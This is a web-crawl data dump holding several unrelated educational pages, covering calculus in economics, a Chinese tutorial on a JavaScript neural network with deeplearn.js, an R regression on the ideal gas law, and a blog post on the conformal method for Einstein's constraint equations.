msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e377fa93-3b63-4ed4-9ece-769c5066d132>\",\"WARC-Concurrent-To\":\"<urn:uuid:1587697a-61c7-4f04-bc07-770d2a60492a>\",\"WARC-IP-Address\":\"208.81.176.91\",\"WARC-Target-URI\":\"http://www.the-mathroom.ca/plgm/plgm2.2/plgm2.2.htm\",\"WARC-Payload-Digest\":\"sha1:4ZBHE6HKYRIXAZPV6X2HWLK4BNXQWBB7\",\"WARC-Block-Digest\":\"sha1:ZEXNEBEM3IKNXLLCYPREUW7EOJAFANZ4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-13/CC-MAIN-2019-13_segments_1552912201882.11_warc_CC-MAIN-20190319012213-20190319034213-00521.warc.gz\"}"}
https://sciencing.com/how-is-calculus-used-in-economics-13593453.html
[ "# How is Calculus Used in Economics?\n\n••• calculatrice image by Danielle Bonardelle from Fotolia.com\nPrint\n\nAlthough introductory economics courses, such as those most college students must complete in the course of their studies, involve little math, an in-depth study of economics requires a rigorous understanding of mathematics, including calculus. Calculus provides the language of economics and the means by which economists solve problems. Calculus is especially significant in illustrating what a leading economist calls a key principle of economics.\n\n## Identification\n\nAs an advanced branch of mathematics, calculus focuses heavily on functions and derivatives. Functions examine the relationship between two or more variables, or entities that take on different values. Mathematicians and economists often use letters, such as X and Y, to symbolize particular variables. If the value of Y changes as the value of X changes, then the two variables have a functional relationship. Derivatives, meanwhile, consider the rate of change in one variable relative to the change in another. Functions and derivatives relate to relevant concepts in economics.\n\n## Function\n\nEconomic research often uses calculus to examine functional relationships. An example includes the relationship between the dependent variable income and various predictors, or independent variables, such as education and experience. If average income rises as years of education and work experience increase, then a positive relationship exists between the variables, namely that income is a function of education and experience. Differential calculus, the process of obtaining derivatives, enables economists to measure the average change in income relative to a single year’s increase in education and/or experience.\n\n## Effects\n\nDerivatives in calculus, or the change in one variable relative to the change in another, are identical to the economic concepts of marginalism, which examines the change in an outcome that results from a single-unit increase in another variable. Marginal changes relate to an important principle in economics: the notion that people tend to think at the margin, according to Harvard economist Greg Mankiw, author of “Principles of Economics,” a popular textbook in college economics courses. Mankiw writes that economists use the term \"marginal changes\" to describe small, incremental changes, such as incremental changes in work hours or factory output.\n\n## Benefits\n\nCalculus, by determining marginal revenues and costs, can help business managers maximize their profits and measure the rate of increase in profit that results from each increase in production. As long as marginal revenue exceeds marginal cost, the firm increases its profits.\n\n## Significance\n\nThe amount of interest to be paid on a loan, whether for a home, motor vehicle or capital equipment for a business, is an important consideration for households and firms. Calculus provides a means for determining the amount of interest paid over the life of a loan." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.92461306,"math_prob":0.8700707,"size":3115,"snap":"2020-45-2020-50","text_gpt3_token_len":576,"char_repetition_ratio":0.13661203,"word_repetition_ratio":0.02183406,"special_character_ratio":0.17303371,"punctuation_ratio":0.11111111,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9712559,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-11-24T13:06:21Z\",\"WARC-Record-ID\":\"<urn:uuid:84dc0610-0713-49af-9834-5ea9383a8285>\",\"Content-Length\":\"387564\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2cff2cca-ef6e-40ec-95d4-64df62a81783>\",\"WARC-Concurrent-To\":\"<urn:uuid:cec87101-b96e-4da0-9e25-9cd7d7c1440e>\",\"WARC-IP-Address\":\"96.6.42.16\",\"WARC-Target-URI\":\"https://sciencing.com/how-is-calculus-used-in-economics-13593453.html\",\"WARC-Payload-Digest\":\"sha1:2LYKSQQ2PSZR3GIER43PJUKGOEUZKPOR\",\"WARC-Block-Digest\":\"sha1:XRMDMODGKGM7525WVR7A53QB4QIIVEWL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141176256.21_warc_CC-MAIN-20201124111924-20201124141924-00357.warc.gz\"}"}
https://www.juhe.cn/news/index/id/2461
[ "API接口,开发服务,免费咨询服务\n\n# 听说你用JavaScript写代码?本文是你的机器学习指南\n\nJavaScript 是一种流行的高级编程语言,它被世界上的绝大多数网站所使用,也被所有主流浏览器所支持。随着深度学习的火热,越来越多开发者开始探索使用 JavaScript 实现人工智能与机器学习算法。近日,来自德国的 Robin Wieruch 发布了一系列使用 JavaScript 构建机器学习的教程,本文将主要介绍使用 JavaScript 实现神经网络的方法。\n\n### 神经网络的目的是什么?\n\n``````function getAccessibleColor(rgb) {\nlet [ r, g, b ] = rgb;\nlet colors = [r / 255, g / 255, b / 255];\nlet c = colors.map((col) => {\nif (col <= 0.03928) {\nreturn col / 12.92;\n}\nreturn Math.pow((col + 0.055) / 1.055, 2.4);\n});\nlet L = (0.2126 * c) + (0.7152 * c) + (0.0722 * c);\nreturn (L > 0.179)\n? [ 0, 0, 0 ]\n: [ 255, 255, 255 ];\n}``````\n\n### JavaScript 中的数据集生成\n\n``````function generateRandomRgbColors(m) {\nconst rawInputs = [];\nfor (let i = 0; i < m; i++) {\nrawInputs.push(generateRandomRgbColor());\n}\nreturn rawInputs;\n}\nfunction generateRandomRgbColor() {\nreturn [\nrandomIntFromInterval(0, 255),\nrandomIntFromInterval(0, 255),\nrandomIntFromInterval(0, 255),\n];\n}\nfunction randomIntFromInterval(min, max) {\nreturn Math.floor(Math.random() * (max - min + 1) + min);\n}``````\n\ngenerateRandomRgbColors() 函数创建给定大小为 m 的部分数据集。数据集中的数据点是 RGB 颜色空间中的颜色。每种颜色在矩阵中被表征为一行,而每一列是颜色的特征。特征是 RGB 空间中的 R、G、B 编码值。数据集还没有任何标签,所以训练集并不完整,因为它只有输入值而没有输出值。\n\n``````function getAccessibleColor(rgb) {\nlet [ r, g, b ] = rgb;\nlet color = [r / 255, g / 255, b / 255];\nlet c = color.map((col) => {\nif (col <= 0.03928) {\nreturn col / 12.92;\n}\nreturn Math.pow((col + 0.055) / 1.055, 2.4);\n});\nlet L = (0.2126 * c) + (0.7152 * c) + (0.0722 * c);\nreturn (L > 0.179)\n? [ 0, 1 ] // black\n: [ 1, 0 ]; // white\n}\n``````\n\n``````function generateColorSet(m) {\nconst rawInputs = generateRandomRgbColors(m);\nconst rawTargets = rawInputs.map(getAccessibleColor);\nreturn { rawInputs, rawTargets };\n}``````\n\n``````function normalizeColor(rgb) {\nreturn rgb.map(v => v / 255);\n}``````\n\n### JavaScript 神经网络模型的设置阶段\n\n• 首先,它使用本地电脑的 GPU 加速机器学习算法中的向量计算。这些机器学习计算与图解计算类似,因此使用 GPU 的计算比使用 CPU 更加高效。\n• 其次,deeplearn.js 的结构与流行的 TensorFlow 库类似(TensorFlow 库也是谷歌开发的,不过它使用的是 Python 语言)。因此如果你想在使用 Python 的机器学习中实现飞跃,那么 deeplearn.js 可提供通向 JavaScript 各领域的捷径。\n\n``npm install deeplearn``\n\n``````class ColorAccessibilityModel {\nnormalizeColor(rgb) {\nreturn rgb.map(v => v / 255);\n}\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nNDArrayMathGPU,\n} from 'deeplearn';\nconst math = new NDArrayMathGPU();\nclass ColorAccessibilityModel {\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nGraph,\nNDArrayMathGPU,\n} from 'deeplearn';\nclass ColorAccessibilityModel {\nsetupSession(trainingSet) {\nconst graph = new Graph();\n}\n..\n}\nexport default ColorAccessibilityModel;``````\n\n``````class ColorAccessibilityModel {\ninputTensor;\ntargetTensor;\nsetupSession(trainingSet) {\nconst graph = new Graph();\nthis.inputTensor = graph.placeholder('input RGB value', );\nthis.targetTensor = graph.placeholder('output classifier', );\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````class ColorAccessibilityModel {\ninputTensor;\ntargetTensor;\nsetupSession(trainingSet) {\nconst graph = new Graph();\nthis.inputTensor = graph.placeholder('input RGB value', );\nthis.targetTensor = graph.placeholder('output classifier', );\nlet connectedLayer = this.createConnectedLayer(graph, this.inputTensor, 0, 64);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 1, 32);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 2, 16);\n}\ncreateConnectedLayer(\ngraph,\ninputLayer,\nlayerIndex,\nunits,\n) 
{\n...\n}\n...\n}\nexport default ColorAccessibilityModel;\n``````\n\n``````class ColorAccessibilityModel {\ninputTensor;\ntargetTensor;\nsetupSession(trainingSet) {\nconst graph = new Graph();\nthis.inputTensor = graph.placeholder('input RGB value', );\nthis.targetTensor = graph.placeholder('output classifier', );\nlet connectedLayer = this.createConnectedLayer(graph, this.inputTensor, 0, 64);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 1, 32);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 2, 16);\n}\ncreateConnectedLayer(\ngraph,\ninputLayer,\nlayerIndex,\nunits,\n) {\nreturn graph.layers.dense(\n`fully_connected_\\${layerIndex}`,\ninputLayer,\nunits\n);\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````class ColorAccessibilityModel {\ninputTensor;\ntargetTensor;\nsetupSession(trainingSet) {\nconst graph = new Graph();\nthis.inputTensor = graph.placeholder('input RGB value', );\nthis.targetTensor = graph.placeholder('output classifier', );\nlet connectedLayer = this.createConnectedLayer(graph, this.inputTensor, 0, 64);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 1, 32);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 2, 16);\n}\ncreateConnectedLayer(\ngraph,\ninputLayer,\nlayerIndex,\nunits,\nactivationFunction\n) {\nreturn graph.layers.dense(\n`fully_connected_\\${layerIndex}`,\ninputLayer,\nunits,\nactivationFunction ? activationFunction : (x) => graph.relu(x)\n);\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````class ColorAccessibilityModel {\ninputTensor;\ntargetTensor;\npredictionTensor;\nsetupSession(trainingSet) {\nconst graph = new Graph();\nthis.inputTensor = graph.placeholder('input RGB value', );\nthis.targetTensor = graph.placeholder('output classifier', );\nlet connectedLayer = this.createConnectedLayer(graph, this.inputTensor, 0, 64);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 1, 32);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 2, 16);\nthis.predictionTensor = this.createConnectedLayer(graph, connectedLayer, 3, 2);\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````class ColorAccessibilityModel {\ninputTensor;\ntargetTensor;\npredictionTensor;\ncostTensor;\nsetupSession(trainingSet) {\nconst graph = new Graph();\nthis.inputTensor = graph.placeholder('input RGB value', );\nthis.targetTensor = graph.placeholder('output classifier', );\nlet connectedLayer = this.createConnectedLayer(graph, this.inputTensor, 0, 64);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 1, 32);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 2, 16);\nthis.predictionTensor = this.createConnectedLayer(graph, connectedLayer, 3, 2);\nthis.costTensor = graph.meanSquaredCost(this.targetTensor, this.predictionTensor);\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nGraph,\nSession,\nNDArrayMathGPU,\n} from 'deeplearn';\nclass ColorAccessibilityModel {\nsession;\ninputTensor;\ntargetTensor;\npredictionTensor;\ncostTensor;\nsetupSession(trainingSet) {\nconst graph = new Graph();\nthis.inputTensor = graph.placeholder('input RGB value', );\nthis.targetTensor = graph.placeholder('output classifier', );\nlet connectedLayer = this.createConnectedLayer(graph, this.inputTensor, 0, 64);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 1, 32);\nconnectedLayer = this.createConnectedLayer(graph, connectedLayer, 2, 16);\nthis.predictionTensor = 
this.createConnectedLayer(graph, connectedLayer, 3, 2);\nthis.costTensor = graph.meanSquaredCost(this.targetTensor, this.predictionTensor);\nthis.session = new Session(graph, math);\nthis.prepareTrainingSet(trainingSet);\n}\nprepareTrainingSet(trainingSet) {\n...\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nGraph,\nSession,\nNDArrayMathGPU,\n} from 'deeplearn';\nconst math = new NDArrayMathGPU();\nclass ColorAccessibilityModel {\nsession;\ninputTensor;\ntargetTensor;\npredictionTensor;\ncostTensor;\n...\nprepareTrainingSet(trainingSet) {\nmath.scope(() => {\n...\n});\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nArray1D,\nGraph,\nSession,\nNDArrayMathGPU,\n} from 'deeplearn';\nconst math = new NDArrayMathGPU();\nclass ColorAccessibilityModel {\nsession;\ninputTensor;\ntargetTensor;\npredictionTensor;\ncostTensor;\n...\nprepareTrainingSet(trainingSet) {\nmath.scope(() => {\nconst { rawInputs, rawTargets } = trainingSet;\nconst inputArray = rawInputs.map(v => Array1D.new(this.normalizeColor(v)));\nconst targetArray = rawTargets.map(v => Array1D.new(v));\n});\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nArray1D,\nInCPUMemoryShuffledInputProviderBuilder,\nGraph,\nSession,\nNDArrayMathGPU,\n} from 'deeplearn';\nconst math = new NDArrayMathGPU();\nclass ColorAccessibilityModel {\nsession;\ninputTensor;\ntargetTensor;\npredictionTensor;\ncostTensor;\n...\nprepareTrainingSet(trainingSet) {\nmath.scope(() => {\nconst { rawInputs, rawTargets } = trainingSet;\nconst inputArray = rawInputs.map(v => Array1D.new(this.normalizeColor(v)));\nconst targetArray = rawTargets.map(v => Array1D.new(v));\nconst shuffledInputProviderBuilder = new InCPUMemoryShuffledInputProviderBuilder([\ninputArray,\ntargetArray\n]);\nconst [\ninputProvider,\ntargetProvider,\n] = shuffledInputProviderBuilder.getInputProviders();\n});\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nArray1D,\nInCPUMemoryShuffledInputProviderBuilder\nGraph,\nSession,\nNDArrayMathGPU,\n} from 'deeplearn';\nconst math = new NDArrayMathGPU();\nclass ColorAccessibilityModel {\nsession;\ninputTensor;\ntargetTensor;\npredictionTensor;\ncostTensor;\nfeedEntries;\n...\nprepareTrainingSet(trainingSet) {\nmath.scope(() => {\nconst { rawInputs, rawTargets } = trainingSet;\nconst inputArray = rawInputs.map(v => Array1D.new(this.normalizeColor(v)));\nconst targetArray = rawTargets.map(v => Array1D.new(v));\nconst shuffledInputProviderBuilder = new InCPUMemoryShuffledInputProviderBuilder([\ninputArray,\ntargetArray\n]);\nconst [\ninputProvider,\ntargetProvider,\n] = shuffledInputProviderBuilder.getInputProviders();\nthis.feedEntries = [\n{ tensor: this.inputTensor, data: inputProvider },\n{ tensor: this.targetTensor, data: targetProvider },\n];\n});\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nArray1D,\nInCPUMemoryShuffledInputProviderBuilder,\nGraph,\nSession,\nSGDOptimizer,\nNDArrayMathGPU,\n} from 'deeplearn';\nconst math = new NDArrayMathGPU();\nclass ColorAccessibilityModel {\nsession;\noptimizer;\nbatchSize = 300;\ninitialLearningRate = 0.06;\ninputTensor;\ntargetTensor;\npredictionTensor;\ncostTensor;\nfeedEntries;\nconstructor() {\nthis.optimizer = new SGDOptimizer(this.initialLearningRate);\n}\n...\n}\nexport default ColorAccessibilityModel;``````\n\n### 训练阶段\n\n``````class ColorAccessibilityModel {\n...\ntrain() {\nmath.scope(() => 
{\nthis.session.train(\nthis.costTensor,\nthis.feedEntries,\nthis.batchSize,\nthis.optimizer\n);\n});\n}\n}\nexport default ColorAccessibilityModel;``````\n\n``````class ColorAccessibilityModel {\n...\ntrain(step) {\nlet learningRate = this.initialLearningRate * Math.pow(0.90, Math.floor(step / 50));\nthis.optimizer.setLearningRate(learningRate);\nmath.scope(() => {\nthis.session.train(\nthis.costTensor,\nthis.feedEntries,\nthis.batchSize,\nthis.optimizer\n);\n}\n}\n}\nexport default ColorAccessibilityModel;``````\n\n``````import {\nArray1D,\nInCPUMemoryShuffledInputProviderBuilder,\nGraph,\nSession,\nSGDOptimizer,\nNDArrayMathGPU,\nCostReduction,\n} from 'deeplearn';\nclass ColorAccessibilityModel {\n...\ntrain(step, computeCost) {\nlet learningRate = this.initialLearningRate * Math.pow(0.90, Math.floor(step / 50));\nthis.optimizer.setLearningRate(learningRate);\nlet costValue;\nmath.scope(() => {\nconst cost = this.session.train(\nthis.costTensor,\nthis.feedEntries,\nthis.batchSize,\nthis.optimizer,\ncomputeCost ? CostReduction.MEAN : CostReduction.NONE,\n);\nif (computeCost) {\ncostValue = cost.get();\n}\n});\nreturn costValue;\n}\n}\nexport default ColorAccessibilityModel;``````\n\n### 推断阶段\n\n``````class ColorAccessibilityModel {\n...\npredict(rgb) {\nlet classifier = [];\nmath.scope(() => {\nconst mapping = [{\ntensor: this.inputTensor,\ndata: Array1D.new(this.normalizeColor(rgb)),\n}];\nclassifier = this.session.eval(this.predictionTensor, mapping).getValues();\n});\nreturn [ ...classifier ];\n}\n}\nexport default ColorAccessibilityModel;``````\n\n### 在 JavaScript 中可视化学习神经网络" ]
[ null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.5511691,"math_prob":0.9086816,"size":32339,"snap":"2022-27-2022-33","text_gpt3_token_len":14929,"char_repetition_ratio":0.18747488,"word_repetition_ratio":0.99852943,"special_character_ratio":0.22124988,"punctuation_ratio":0.28976035,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97647697,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-29T19:23:30Z\",\"WARC-Record-ID\":\"<urn:uuid:8dc25ada-f614-4e1b-ae83-ee0685c40579>\",\"Content-Length\":\"192520\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:67708adf-5163-4a7a-917c-0dc2a6f1fefd>\",\"WARC-Concurrent-To\":\"<urn:uuid:3db18008-7edd-4b39-9eea-d36b76aacd96>\",\"WARC-IP-Address\":\"203.107.54.210\",\"WARC-Target-URI\":\"https://www.juhe.cn/news/index/id/2461\",\"WARC-Payload-Digest\":\"sha1:PAGNB6UB7B3VYFAXXLVA4DIV5I3VHQOO\",\"WARC-Block-Digest\":\"sha1:WXA5JBQ72S67FXEGV675JZVYV7LFJ6NS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103642979.38_warc_CC-MAIN-20220629180939-20220629210939-00573.warc.gz\"}"}
https://www.r-bloggers.com/2013/05/when-does-the-kinetic-theory-of-gases-fail-examining-its-postulates-with-assistance-from-simple-linear-regression-in-r/
[ "[This article was first published on The Chemical Statistician » R programming, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)\nWant to share your content on R-bloggers? click here if you have a blog, or here if you don't.\n\n#### Introduction\n\nThe Ideal Gas Law,", null, "$\\text{PV} = \\text{nRT}$, is a very simple yet useful relationship that describes the behaviours of many gases pretty well in many situations.  It is “Ideal” because it makes some assumptions about gas particles that make the math and the physics easy to work with; in fact, the simplicity that arises from these assumptions allows the Ideal Gas Law to be easily derived from the kinetic theory of gases.  However, there are situations in which those assumptions are not valid, and, hence, the Ideal Gas Law fails.\n\nBoyle’s law is inherently a part of the Ideal Gas Law.  It states that, at a given temperature, the pressure of an ideal gas is inversely proportional to its volume.  Equivalently, it states the product of the pressure and the volume of an ideal gas is a constant at a given temperature.", null, "$\\text{P} \\propto \\text{V}^{-1}$\n\n#### An Example of The Failure of the Ideal Gas Law\n\nThis law is valid for many gases in many situations, but consider the following data on the pressure and volume of 1.000 g of oxygen at 0 degrees Celsius.  I found this data set in Chapter 5.2 of ”General Chemistry” by Darrell Ebbing and Steven Gammon.\n\n      Pressure (atm) Volume (L) Pressure X Volume (atm*L)\n[1,]           0.25     2.8010                  0.700250\n[2,]           0.50     1.4000                  0.700000\n[3,]           0.75     0.9333                  0.699975\n[4,]           1.00     0.6998                  0.699800\n[5,]           2.00     0.3495                  0.699000\n[6,]           3.00     0.2328                  0.698400\n[7,]           4.00     0.1744                  0.697600\n[8,]           5.00     0.1394                  0.697000\n\nThe right-most column is the product of pressure and temperature, and it is not constant.  However, are the differences between these values significant, or could it be due to some random variation (perhaps round-off error)?\n\nHere is the scatter plot of the pressure-volume product with respect to pressure.", null, "These points don’t look like they are on a horizontal line!  Let’s analyze these data using normal linear least-squares regression in R.\n\n> linear.regression.pv.pressure = lm(pressure.times.volume~pressure)\n> summary(linear.regression.pv.pressure)\n\nCall:\nlm(formula = pressure.times.volume ~ pressure)\n\nResiduals:\nMin         1Q     Median         3Q        Max\n-8.380e-05 -5.054e-05  1.092e-05  4.946e-05  6.411e-05\n\nCoefficients:\nEstimate Std. Error  t value Pr(>|t|)\n(Intercept)  7.004e-01  3.578e-05 19578.59  < 2e-16 ***\npressure    -6.916e-04  1.354e-05   -51.09 3.77e-09 ***\n---\nSignif. codes:  0 ‘***’ 0.001 ‘**’ 0.01 ‘*’ 0.05 ‘.’ 0.1 ‘ ’ 1\n\nResidual standard error: 6.327e-05 on 6 degrees of freedom\nMultiple R-squared: 0.9977, Adjusted R-squared: 0.9973\nF-statistic:  2610 on 1 and 6 DF,  p-value: 3.772e-09\n\nEven though the magnitude of the slope is only 0.0006916, the p-value of the slope shows that there is strong evidence that the product of pressure and volume is not constant with respect to pressure.  Here is the same scatter plot above with the regression line added.  
Note how I used the abline() and text() functions to add the line and the equation of the regression line, respectively.  As usual, I used png() and dev.off() to save the image to my folder of choice.\n\npng('INSERT YOUR DIRECTORY PATH HERE/regression pv vs pressure.png')\nplot(pressure, pressure.times.volume, main = expression(\"(Pressure X Volume) for 1.000 g of Oxygen at 0\"^0*\"C\"), ylab = 'Pressure X Volume (atm*L)', xlab = 'Pressure (atm)')\nabline(linear.regression.pv.pressure)\ntext(2, 0.6975, 'y = 0.7004 - 0.0006916x')\ndev.off()", null, "This example for oxygen is consistent with experimental results for many other gases, which show that\n\n- the Ideal Gas Law holds well for low pressures and moderate temperatures\n\n- the Ideal Gas Law fails at high pressures and low temperatures\n\n#### Examining the Postulates of the Kinetic Theory of Gases – Why and When They Fail\n\nLet's go back to the assumptions of the kinetic theory of gases to see which assumptions may not hold under high pressures or low temperatures.  Here are 2 key ones (numbered as #1 and #3 in Chapter 5 of “General Chemistry” by Darrell Ebbing and Steven Gammon).\n\nPostulate #1: The volume of space occupied by gas particles is negligible compared with the total gas volume.  This allows the theory to model the gas particles as freely moving throughout the entire volume of the gas.  At low pressures, the volume of the individual gas particles is negligible compared to the total volume of the gas,", null, "$V$.  However, at high pressures, the particles are closer to and collide with each other more frequently, so their individual volume becomes more important; the space through which the particle moves becomes significantly different from", null, "$V$.\n\nPostulate #3: The forces of attraction between the gas particles (i.e. the intermolecular forces) in a gas are weak or negligible.\n\n• At low pressures, the particles are farther apart, so these intermolecular forces are very weak, and this postulate holds well.  At high pressures, the gas particles are closer together, so these intermolecular forces are strong enough to affect the collisions of the molecules and pull them slightly away from the walls of the container.  This reduces the pressure that the gas exerts on the container's walls.\n• At high temperatures, the particles move too fast for the weak intermolecular forces to have any appreciable effect on them.  However, at low temperatures, the molecules are moving slower – slow enough that they start to become attracted to nearby molecules.\n\nIn a later post, I will discuss the van der Waals equation, which incorporates these deviations from the ideal assumptions of the kinetic theory of gases to modify the Ideal Gas Law.\n\n#### Reference:\n\nChapter 5, Sections 2 and 8.  “General Chemistry” by Darrell Ebbing and Steven Gammon.  6th Edition, 1999." ]
[ null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://chemicalstatistician.files.wordpress.com/2013/05/scatter-plot-pv-vs-pressure.png", null, "https://chemicalstatistician.files.wordpress.com/2013/05/regression-pv-vs-pressure.png", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://feeds.wordpress.com/1.0/comments/chemicalstatistician.wordpress.com/848/", null, "https://i0.wp.com/stats.wordpress.com/b.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.86684805,"math_prob":0.96981,"size":6340,"snap":"2020-45-2020-50","text_gpt3_token_len":1622,"char_repetition_ratio":0.12720959,"word_repetition_ratio":0.05899705,"special_character_ratio":0.27066246,"punctuation_ratio":0.15861027,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9905582,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16],"im_url_duplicate_count":[null,null,null,null,null,null,null,7,null,null,null,null,null,6,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-22T21:39:41Z\",\"WARC-Record-ID\":\"<urn:uuid:e34620cd-8210-424b-937f-9339dbbb00db>\",\"Content-Length\":\"97401\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a9203407-48aa-4a34-8f49-de242b366a57>\",\"WARC-Concurrent-To\":\"<urn:uuid:9a8ca125-3db7-4281-9f4d-8aebb43c879c>\",\"WARC-IP-Address\":\"104.28.8.205\",\"WARC-Target-URI\":\"https://www.r-bloggers.com/2013/05/when-does-the-kinetic-theory-of-gases-fail-examining-its-postulates-with-assistance-from-simple-linear-regression-in-r/\",\"WARC-Payload-Digest\":\"sha1:O7MSEIE5XFFTENGQ27F7GADLJJN64BLI\",\"WARC-Block-Digest\":\"sha1:2MPWAXRQSSULL2ND2EMUO7BBHDJNVGVO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107880038.27_warc_CC-MAIN-20201022195658-20201022225658-00240.warc.gz\"}"}
https://anhngq.wordpress.com/2010/06/05/
[ "# Ngô Quốc Anh\n\n## June 5, 2010\n\n### Why the conformal method is useful in studying the Einstein equations?\n\nFiled under: Nghiên Cứu Khoa Học, PDEs, Riemannian geometry — Tags: — Ngô Quốc Anh @ 19:20\n\nI presume you have some notions about general relativity, especially the Einstein equations", null, "${\\rm Eins}_{\\alpha\\beta}=T_{\\alpha\\beta}$.\n\nAs these equations are basically hyperbolic for a suitable metric, it is reasonable to study the Cauchy problems for them. Under the Gauss and Codazzi conditions, we have two constraints called Hamiltonian and Momentum constrains. Cauchy problem is to determine the solvable of these constrains of variables", null, "$K$-the extrinsic curvature and", null, "$g$-the spatial metric. Interestingly, the conformal method says that we can start with an arbitrary metric then we recast the constrain equations into a form which is more amenable to analysis by splitting the Cauchy data. In this method, we try to solve", null, "$\\gamma$ within the conformal class represented by the initial metric. So, in general, the conformal factor is chosen so that we eventually have a simplest model.\n\nThis idea is given via the following theorem.\n\nTheorem. Let", null, "$\\mathcal D =(\\gamma, \\sigma, \\tau,\\psi,\\pi)$ be a conformal initial data set for the Einstein-scalar field constraint equations on", null, "$\\Sigma$. If", null, "$\\displaystyle \\widetilde \\gamma =\\theta^\\frac{4}{n-2}\\gamma$\n\nfor a smooth positive function", null, "$\\theta$, then we define the corresponding conformally transformed initial data set by", null, "$\\displaystyle\\widetilde{\\mathcal D} =(\\widetilde\\gamma, \\widetilde \\sigma, \\widetilde \\tau,\\widetilde\\psi,\\widetilde \\pi)=(\\theta^\\frac{4}{n-2}\\gamma, \\theta^{-2}\\sigma, \\tau,\\psi,\\theta^\\frac{-2n}{n-2}\\pi)$.\n\nLet", null, "$W$ be the solution to the conformal form of the momentum constrain equation w.r.t. the conformal initial data set", null, "$\\mathcal D$ and let", null, "$\\widetilde W$ be the solution to the conformal form of the momentum constrain equation w.r.t. the conformal initial data set", null, "$\\widetilde{\\mathcal D}$ (we just assume both exist). Then", null, "$\\varphi$ is a solution to the Einstein scalar field Lichnerowicz equation for the conformal data", null, "$\\mathcal D$ with", null, "$W$", null, "$\\displaystyle \\Delta_\\gamma \\varphi - \\mathcal R_{\\gamma, \\psi}\\varphi +\\mathcal A_{\\gamma, W, \\pi}\\varphi^{-\\frac{3n-2}{n-2}}-\\mathcal B_{\\tau, \\psi}\\varphi^\\frac{n+2}{n-2}=0$\n\nif and only if", null, "$\\theta^{-1}\\varphi$ is a solution to the Einstein scalar field Lichnerowicz equation for the conformal data", null, "$\\widetilde{\\mathcal D}$ with", null, "$\\widetilde W$", null, "$\\displaystyle \\Delta_{\\widetilde\\gamma} (\\theta^{-1}\\varphi) - \\mathcal R_{\\widetilde\\gamma, \\widetilde\\psi}(\\theta^{-1}\\varphi) +\\mathcal A_{\\widetilde\\gamma, \\widetilde W, \\widetilde\\pi}(\\theta^{-1}\\varphi)^{-\\frac{3n-2}{n-2}}-\\mathcal B_{\\widetilde\\tau, \\widetilde\\psi}(\\theta^{-1}\\varphi)^\\frac{n+2}{n-2}=0$.\n\nWe refer the reader to a paper due to Yvonne Choquet-Bruhat et al. [here] published in Class. Quantum Grav. in 2007 for details. We adopt this theorem from that paper, however, there is no proof there.\n\n(more…)" ]
